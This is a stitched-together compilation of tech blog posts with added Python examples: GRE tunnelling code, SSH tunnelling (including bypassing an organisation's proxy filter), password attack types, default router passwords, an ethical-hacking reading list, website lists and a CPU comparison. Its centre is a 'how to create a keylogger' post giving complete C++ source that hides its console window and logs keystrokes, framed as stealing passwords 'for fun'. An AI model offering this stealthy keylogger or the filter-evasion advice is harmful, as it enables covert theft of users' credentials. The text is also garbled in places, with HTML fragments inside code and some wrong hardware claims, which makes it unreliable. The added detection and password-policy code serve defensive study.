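    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def ipv4_packet(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Build a 20-byte IPv4 header (no options) followed by the payload."""
    def header(csum: int) -> bytes:
        return struct.pack(
            "!BBHHHBBH4s4s",
            0x45, 0, 20 + len(payload),  # version/IHL, DSCP, total length
            0, 0,                        # identification, flags/fragment
            64, proto, csum,             # TTL, protocol, header checksum
            ipaddress.IPv4Address(src).packed,
            ipaddress.IPv4Address(dst).packed)
    return header(checksum(header(0))) + payload

def gre_encapsulate(inner: bytes, tunnel_src: str, tunnel_dst: str) -> bytes:
    """Prefix a basic GRE header, then the delivery IPv4 header."""
    gre = struct.pack("!HH", 0x0000, GRE_PROTO_IPV4)  # no options, version 0
    return ipv4_packet(tunnel_src, tunnel_dst, IPPROTO_GRE, gre + inner)

def parse_ipv4(packet: bytes):
    """Validate an IPv4 header and return (src, dst, protocol, payload)."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0F) * 4
    total = struct.unpack("!H", packet[2:4])[0]
    if ihl < 20 or not ihl <= total <= len(packet):
        raise ValueError("inconsistent IPv4 lengths")
    if checksum(packet[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    src, dst = (str(ipaddress.IPv4Address(packet[i:i + 4])) for i in (12, 16))
    return src, dst, packet[9], packet[ihl:total]

def is_rfc1918(addr: str) -> bool:
    return any(ipaddress.ip_address(addr) in net for net in RFC1918)

def gre_decapsulate(packet: bytes) -> dict:
    """Separate delivery addressing from payload addressing."""
    d_src, d_dst, proto, body = parse_ipv4(packet)
    if proto != IPPROTO_GRE or len(body) < 4:
        raise ValueError("delivery packet does not carry GRE")
    flags, ptype = struct.unpack("!HH", body[:4])
    if flags != 0 or ptype != GRE_PROTO_IPV4:
        raise ValueError("only a basic GRE header carrying IPv4 is handled")
    p_src, p_dst, p_proto, data = parse_ipv4(body[4:])
    return {"delivery": (d_src, d_dst), "payload": (p_src, p_dst),
            "payload_proto": p_proto, "data": data,
            "payload_is_private": is_rfc1918(p_src) and is_rfc1918(p_dst),
            "delivery_is_private": is_rfc1918(d_src) or is_rfc1918(d_dst)}

# Constructed sample: RFC 1918 hosts behind two tunnel endpoints. Protocol 17
# (UDP) is only a label here; the payload bytes are opaque sample data.
INNER = ipv4_packet("10.0.1.5", "10.0.2.9", 17, b"constructed payload")
TUNNELLED = gre_encapsulate(INNER, "198.51.100.10", "203.0.113.20")

if __name__ == "__main__":
    for key, value in gre_decapsulate(TUNNELLED).items():
        print(f"{key}: {value}")
```

Routers along the path see only the delivery header; the private payload addresses reappear once the far tunnel endpoint strips the 24 bytes of delivery and GRE headers.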
In contrast, an IP payload might believe it
sees a data link layer delivery when it is
carried inside the Layer 2 Tunneling Protocol
(L2TP), which appears to the payload
mechanism as a protocol of the data link
layer. L2TP, however, actually runs over the
transport layer using User Datagram Protocol
(UDP) over IP. The IP in the delivery protocol
could run over any data-link protocol from
IEEE 802.2 over IEEE 802.3 (i.e., standards-
based Ethernet) to the Point-to-Point
Protocol (PPP) over a dialup modem link.
Tunneling protocols may use data encryption
to transport insecure payload protocols over
a public network (such as the Internet),
thereby providing VPN functionality. IPsec
has an end-to-end Transport Mode, but can
also operate in a tunneling mode through a
trusted security gateway.
Secure Shell tunneling
A Secure Shell (SSH) tunnel consists of an
encrypted tunnel created through an SSH
protocol connection. Users may set up SSH
tunnels to transfer unencrypted traffic over a
network through an encrypted channel. For
example, Microsoft Windows machines can
share files using the Server Message Block
(SMB) protocol, a non-encrypted protocol. If
one were to mount a Microsoft Windows file-
system remotely through the Internet,
someone snooping on the connection could
see transferred files. To mount the Windows
file-system securely, one can establish an SSH
tunnel that routes all SMB traffic to the
remote fileserver through an encrypted
channel. Even though the SMB protocol itself
contains no encryption, the encrypted SSH
channel through which it travels offers
security.
Reverse ssh tunnel
To set up an SSH tunnel, one configures an
SSH client to forward a specified local port
to a port on the remote machine. Once the
SSH tunnel has been established, the user
can connect to the specified local port to
access the network service. The local port
need not have the same port number as the
remote port.
SSH tunnels provide a means to bypass
firewalls that prohibit certain Internet
services – so long as a site allows outgoing
connections. For example, an organization
may prohibit a user from accessing Internet
web pages (port 80) directly without passing
through the organization's proxy filter (which
provides the organization with a means of
monitoring and controlling what the user
sees through the web). But users may not
wish to have their web traffic monitored or
blocked by the organization's proxy filter. If
users can connect to an external SSH server,
they can create an SSH tunnel to forward a
given port on their local machine to port 80
on a remote web-server. To access the
remote web-server, users would point their
browser to the local port at http://localhost/.
Some SSH clients support dynamic port
forwarding that allows the user to create a
SOCKS 4/5 proxy. In this case users can
configure their applications to use their local
SOCKS proxy server. This gives more
flexibility than creating an SSH tunnel to a
single port as previously described. SOCKS
can free the user from the limitations of
connecting only to a predefined remote port
and server. If an application doesn't support
SOCKS, one can use a "socksifier" to redirect
the application to the local SOCKS proxy
server. Some "socksifiers", such as Proxycap,
support SSH directly, thus avoiding the need
for an SSH client.

HOW TO CREATE A KEYLOGGER USING C++?

Any idea what a keylogger is?
A keylogger is a software program that is used
to monitor and log each of the keys a user
types on a computer keyboard. In this way a
keylogger steals user information such as
passwords and sends it to the hacker.
There are many keyloggers on the market,
but never mind, we are programmers and we
develop our own version of the tool.
Copy the code below, compile and run it.
Once you run the program you can see the
“log” file created alongside the executable.
CODE:
# include <iostream>
#include <fstream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_<span
class="la4l7p" id="la4l7p_5">HOME</
span>)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke ==
110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClas
s", NULL);
ShowWindow(Stealth,0);
}
Test it on your PC and have fun
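From the defender's side, the listing above combines three behaviours that are each visible as plain strings in a compiled binary or a source file: polling GetAsyncKeyState, hiding the console window, and writing to a file. The following is an added example, not part of the original post, that triages a file by those strings; the verdict names, the scoring rule and the three sample blobs are constructed for illustration.

```python
import re

# Strings that reveal the behaviours used by the listing above. A behaviour
# counts as present only when every string in its tuple is found.
BEHAVIOURS = {
    "polls global key state": (b"GetAsyncKeyState",),
    "hides its console window": (b"ConsoleWindowClass", b"ShowWindow"),
    "writes to a file": (b"fopen",),
}
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> list:
    """Printable-ASCII runs of 4+ bytes, like the Unix `strings` tool."""
    return PRINTABLE_RUN.findall(blob)


def triage(blob: bytes) -> dict:
    """Report which behaviours a binary or source file exposes."""
    strings = extract_strings(blob)
    found = [name for name, needles in BEHAVIOURS.items()
             if all(any(n in s for s in strings) for n in needles)]
    polls = "polls global key state" in found
    hides = "hides its console window" in found
    if polls and hides:
        verdict = "suspicious"    # captures keys while concealing itself
    elif polls:
        verdict = "review"        # games and hotkey tools also poll key state
    else:
        verdict = "no indicator"
    return {"verdict": verdict, "behaviours": found}


def _blob(*strings: bytes) -> bytes:
    """Constructed stand-in for a binary: a stub header and NUL-separated strings."""
    return b"MZ\x90\x00" + b"\x00".join(strings) + b"\x00"


# Constructed samples, not taken from real programs.
SAMPLE_LOGGER = _blob(b"GetAsyncKeyState", b"AllocConsole", b"FindWindowA",
                      b"ConsoleWindowClass", b"ShowWindow", b"fopen", b"LOG.txt")
SAMPLE_HOTKEY_TOOL = _blob(b"GetAsyncKeyState", b"CreateWindowExA",
                           b"fopen", b"settings.ini")
SAMPLE_EDITOR = _blob(b"CreateFileW", b"ReadFile", b"ShowWindow")

if __name__ == "__main__":
    for name, blob in [("logger", SAMPLE_LOGGER),
                       ("hotkey tool", SAMPLE_HOTKEY_TOOL),
                       ("editor", SAMPLE_EDITOR)]:
        print(name, triage(blob))
```

String matching is only a first pass: legitimate software also calls GetAsyncKeyState, which is why a lone hit is marked for review rather than flagged, and a packed binary exposes none of these strings.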

Useful Website 2

ctrlq.org/screenshots – for capturing
screenshots of web pages on mobile and
desktops.
dictation.io – online voice recognition in the
browser itself.
zerodollarmovies.com –
find full-length movies on YouTube.
screenr.com – record movies of your
desktop and send them straight to YouTube.
goo.gl – shorten long URLs and convert URLs
into QR codes.
unfurlr.come – find the original URL that’s
hiding behind a short URL.
qClock – find the local time of a city using
Google Maps.
copypastecharacter.com – copy special
characters that aren’t on your keyboard.
codeacademy.com – the best place to learn
coding online.
lovelycharts.com – create flowcharts,
network diagrams, sitemaps, etc.
iconfinder.com – find icons of all sizes.
office.com – download templates, clipart and
images for your Office documents.
followupthen.com – the easiest way to setup
email reminders.
jotti.org – scan any suspicious file or email
attachment for viruses.
wolframalpha.com – gets answers directly
without searching – see more wolfram tips.
printwhatyoulike.com – print web pages
without the clutter.
ctrlq.save – save online files to Dropbox or
Google Drive directly.
ctrql.rss – a search engine for RSS feeds.
e.ggtimer.com – a simple online timer for
your daily needs.
coralcdn.org – if a site is down due to heavy
traffic, try accessing it through coral CDN.
random.org – pick random numbers, flip
coins, and more.
pdfescape.com – lets you quickly edit
PDFs in the browser itself.
tubemogul.com – simultaneously upload
videos to YouTube and other video sites.
scr.im – share your email address online
without worrying about spam.
spypig.com – now get read receipts for your
email.
myfonts.com/WhatTheFont – quickly
determine the font name from an image.
google.com/webfonts – a good collection of
open source fonts.
regex.info – find data hidden in your
photographs – see more EXIF tools.
livestream.com – broadcast events live over
the web, including your desktop screen.
iwantmyname.com – helps you search
domains across all TLDs.
homestyler.com – design from scratch or re-
model your home in 3d.
join.me – share your screen with anyone over
the web.
onlineocr.net – recognize text from scanned
PDFs – see other OCR tools.
flightstats.com – Track flight status at
airports worldwide.
wetransfer.com – for sharing really big files
online.
hundredzeros.com – the site lets you
download free Kindle books.
polishmywriting.com – check your writing
for spelling or grammatical errors.
marker.to – easily highlight the important
parts of a web page for sharing.
typewith.me – work on the same document
with multiple people.
whichdateworks.com – planning an event?
find a date that works for all.
everytimezone.com – a less confusing view
of the world time zones.
gtmetrix.com – the perfect tool for
measuring your site performance online.
noteflight.com – print music sheets, write
your own music online (review).
imo.im – chat with your buddies on Skype,
Facebook, Google Talk, etc. from one place.
translate.google.com – translate web pages,
PDFs and Office documents.
kleki.com – create paintings and sketches
with a wide variety of brushes.
similarsites.com – discover new sites that are
similar to what you like already.
wordle.net – quickly summarize long pieces of
text with tag clouds.
bubbl.us – create mind-maps, brainstorm
ideas in the browser.
kuler.adobe.com – get color ideas, also
extract colors from photographs.
liveshare.com – share your photos in an
album instantly.
lmgtfy.com – when your friends are too lazy
to use Google on their own.
midomi.com – when you need to find the
name of a song.
google.com/history – see your past searches,
also among most important Google URLs
bing.com/images – automatically find
perfectly-sized wallpapers for mobiles.
faxzero.com – send an online fax for free –
see more fax services.
feedmyinbox.com – get RSS feeds as an email
newsletter.
ge.tt – quickly send a file to someone, they
can even preview it before downloading.
pipebytes.com – transfer files of any size
without uploading to a third-party server.
tinychat.com – setup a private chat room in
micro-seconds.
privnote.com – create text notes that will
self-destruct after being read.
boxoh.com – track the status of any
shipment on Google Maps – alternative.
mondrian.io – create vector drawings in the
browser
draw.io – create diagrams and flowcharts in
the browser, export your drawings to Google
Drive and Dropbox.
downforeveryoneorjustme.com – find if your
favorite website is offline or not?
ewhois.com – find the other websites of a
person with reverse Analytics lookup.
whoishostingthis.com – find the web host of
any website.
labnol.org – software tutorials and how-to
guides.
disposablewebpage.com – create a temporary
web page that self-destructs.
urbandictionary.com – find definitions of
slangs and informal words.
seatguru.com – consult this site before
choosing a seat for your next flight.
unsplash.com – download images absolutely
free.
zoom.it – view very high-resolution images
in your browser without scrolling.
scribblemaps.com – create custom Google
Maps easily.
alertful.com – quickly setup email reminders
for important events.
picmonkey.com – Picnik is offline but
PicMonkey is an even better image editor.
formspring.me – you can ask or answer
personal questions here.
sumopaint.com – an excellent layer-based
online image editor.
snopes.com – find if that email offer you
received is real or just another scam.
typingweb.com – master touch-typing with
these practice sessions.
mailvu.com – send video emails to anyone
using your web cam.
timerime.com – create timelines with audio,
video and images.
stupeflix.com – make a movie out of your
images, audio and video clips.
safeweb.norton.com – check the trust level
of any website.
teuxdeux.com – a beautiful to-do app that
looks like your paper diary.
deadurl.com – you’ll need this when your
bookmarked web pages are deleted.
minutes.io – quickly capture effective notes
during meetings.
youtube.com/leanback – Watch YouTube
channels in TV mode.
youtube.com/disco – quickly create a video
playlist of your favorite artist.
talltweets.com – Send tweets longer than 140
characters.
pancake.io – create a free and simple
website using your Dropbox account.
builtwith.com – find the technology stack to
know everything about a website.
woorank.com – research a website from the
SEO perspective.
mixlr.com – broadcast live audio over the
web.
radbox.me – bookmark online videos and
watch them later (review).
tagmydoc.com – add QR codes to your
documents and presentations (review).
notes.io – the easiest way to write short text
notes in the browser.
ctrlq.org/html-mail – send rich-text mails to
anyone, anonymously.
fiverr.com – hire people to do little things
for $5.
otixo.com – easily manage your online files
on Dropbox, Google Docs, etc.
ifttt.com – create a connection between all
your online accounts.

Internet Useful Website

virustotal.com – scan any suspicious file or
email attachment for viruses.
isnsfw.com – when you wish to share a NSFW
page but with a warning.
truveo.com – the best place for searching
web videos.
tabbloid.com – your favorite blogs delivered
as PDFs.
warrick.cs.odu.edu – you’ll need this when
your bookmarked web pages are deleted.
tempalias.com – generate temporary email
aliases, better than disposable email.
whisperbot.com – send an email without
using your own account.
errorlevelanalysis.com – find whether a
photo is real or a photoshopped one.
google.com/dictionary – get word meanings,
pronunciations and usage examples.
wobzip.org – unzip your compressed files
online.
namemytune.com – when you need to find
the name of a song.
snapask.com – use email on your phone to
find sports scores, read Wikipedia, etc.
pastebin.com – the site has been blocked in
India.
encrypted.google.com – Google now
redirects all logged-in users to the https
version of google.com by default so this is
no longer necessary.
bounceapp.com – replace this with a version
that works on mobile.
dabbleboard.com – an online virtual
whiteboard that will shut down in August
2012.
chipin.com – helps you raise funds online for
an event or a cause (closed).

Types of attacks in computing

1. Dictionary attack :-
A dictionary attack uses a targeted technique
of successively trying all the words in an
exhaustive list called a dictionary (a
pre-arranged list of values).
2. Brute Force Attack :-
In contrast with a brute force attack, where
a large proportion of the key space is searched
systematically, a dictionary attack tries only
those possibilities which are most likely to
succeed, typically derived from a list of
words, for example a dictionary (hence the
phrase dictionary attack).
3. Hybrid Attack :-
It works like a dictionary attack, but adds
some numbers and symbols to the words
from the dictionary and tries to crack the
password.
4. Syllable Attack :-
It is a combination of the brute force
attack and the dictionary attack.
5. Rule-Based Attack :-
This attack is used when the attacker gets
some information about the password.
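The distinctions above matter most when deciding which passwords to accept. The following added example (not part of the original post) is a password-policy check that names the cheapest of the dictionary, hybrid and brute force classes that would find a candidate, and measures the brute-force key space in bits. The word list, the 60-bit threshold and the sample passwords are constructed assumptions.

```python
import math
import string

# Constructed sample word list; a real audit would load a far larger one.
DICTIONARY = {"password", "dragon", "welcome", "monkey", "summer"}
AFFIXES = string.digits + string.punctuation


def weakest_attack(password: str, dictionary=DICTIONARY) -> str:
    """Name the cheapest attack class from the list above that finds it."""
    lowered = password.lower()
    if lowered in dictionary:
        return "dictionary"
    # Hybrid: a dictionary word with numbers or symbols added around it.
    core = lowered.strip(AFFIXES)
    if core != lowered and core in dictionary:
        return "hybrid"
    return "brute force"


def bruteforce_bits(password: str) -> float:
    """log2 of the key space a systematic search has to cover."""
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation)
    alphabet = sum(len(c) for c in classes if any(ch in c for ch in password))
    if alphabet == 0:      # empty, or no character from the counted classes
        return 0.0
    return len(password) * math.log2(alphabet)


def accept(password: str, min_bits: float = 60.0) -> tuple:
    """Reject what a dictionary or hybrid run would find, then anything
    whose brute-force key space is below min_bits (an assumed threshold)."""
    attack = weakest_attack(password)
    bits = bruteforce_bits(password)
    if attack != "brute force":
        return False, f"found by {attack} attack"
    if bits < min_bits:
        return False, f"key space only {bits:.1f} bits"
    return True, f"{bits:.1f} bits of brute-force work"


# Constructed candidates covering each outcome.
SAMPLES = ["password", "Dragon2014!", "tq7#Lm2x", "vR9$kq2!Wz7mPd"]

if __name__ == "__main__":
    for candidate in SAMPLES:
        print(f"{candidate!r}: {accept(candidate)}")
```

"Dragon2014!" uses four character classes and still fails, because stripping the added digits and symbol leaves a dictionary word.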

Router passwords Finder App

Description
Router Passwords Finder app provides quick
access for technicians to default passwords
used on routers, default web logins, CCTV
systems and other electronic devices.
Using this app, you can:
- Browse a large database of router
manufacturers.
- Search for router manufacturers.
- See a list of all models from a router
manufacturer.
- Copy information, share it, or bookmark a
model.
https://play.google.com/store/apps/details?id=com.viddic.routerpasswords
Alternative Websites
http://www.routerpasswords.com
http://portforward.com/default_username_password/

How to become an ethical hacker

An essential guide to
becoming an ethical hacker
I often get a number of people asking for
guidance about how they can become an
ethical hacker. I also receive even more
requests about how to become a black hat
hacker. The latter requests are ignored. Below
is a definition of an ethical hacker:
Ethical hacker
noun
1. a person who hacks into a computer
network in order to test or evaluate its
security, rather than with malicious or
criminal intent.
So if you want to be an ethical hacker, the
truth is there is no easy method to become a
skilled hacker... it’s easy to be a script kiddie
and load up Armitage or Fast-track and fire
every exploit known to man at a target. But
what’s the point of firing Linux exploits at a
Windows box?
You need essential prerequisite knowledge
If you want to get into the IT security world
as a white hat you must be competent in the
following areas:
Networking
Programming
Databases
Once you have a fairly good knowledge of the
above points, THEN it would be a good idea to
learn about hacking. So now you have a good
understanding of the fundamentals of IT, you
can now understand how to break some of the
underlying vulnerabilities within computer
architecture. The following activities should
help you with this:
- Read books about hacking (here are some
good examples):
  - Hacking: The Art of Exploitation, 2nd Edition
  - The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)
  - Metasploit: The Penetration Tester’s Guide
  - BackTrack 5 Wireless Penetration Testing Beginner’s Guide
  - CEH Certified Ethical Hacker All-in-One Exam Guide
  - Google Hacking for Penetration Testers
  - The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws
- Undertake various online courses:
  - CEH
  - OSCP
  - SANS SEC560
- Communicate with and follow fellow IT
security enthusiasts through the following
mediums:
  - Facebook (https://www.facebook.com/pages/Hacking-News-Tutorials/252350961471136)
  - Google+
  - Twitter
- Self-learn by reading and watching online
tutorials:
  - www.video.latesthackingnews.com
  - www.securitytube.net
  - youtube.com
- Download practice environments to practice
and hone newly learned skills:
  - DVWA (Damn Vulnerable Web Application)
  - Metasploitable
  - Samurai WTF
Final note: Hacking is something that takes A
LOT of your time! Be prepared to sacrifice
friendships, relationships and that awesome
social life you used to have!

Characteristics of an effective IT professional

Patience, patience and more patience - IT
can be stressful, fun, challenging and a
whole lot of other things! Having an
overflowing supply of patience – with users,
with other techs, with software, with
hardware, with vendors, with bosses and
with self is of major value!
Ability to adapt quickly to change is another
ingredient that I believe is essential. IT
needs, tools and equipment are constantly
changing – and keeping up with it can be a
challenge. Those that can adapt quickly shrug
off the discarded work of the past in favor of
attacking the new, without seeing the past
work as being futile or a “waste” of time.
A positive outlook is a must have for an
effective IT professional. Change and “issues”
of all kinds crop up daily in the IT world – so
having a positive attitude brings about
stability in self and the environment – things
are just better.
The effective IT professional is not a 9 to 5
person - IT functions often require that work
be done “off” hours. The most miserable IT
person I ever worked with really just wanted
a job to go to between 9-5. Needless to say,
he didn't work out!
A love for challenge rounds out my top 5
characteristics of an effective IT person. IT is
NOT easy street — it is NOT narrowly defined
— it can be multi-disciplined, requiring
knowledge way beyond the technical. IT is
NOT for everyone — good thing — if it was,
everyone would be doing it whether they
possess these characteristics or not!

Friday 1 August 2014

DIFFERENCE BETWEEN CORE i3, CORE i5, CORE i7

► Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of
processor resources)
* 3-4 MB Cache
* 32 nm Silicon (less heat and energy)
► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of
processor resources)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and energy)
► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of
processor resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)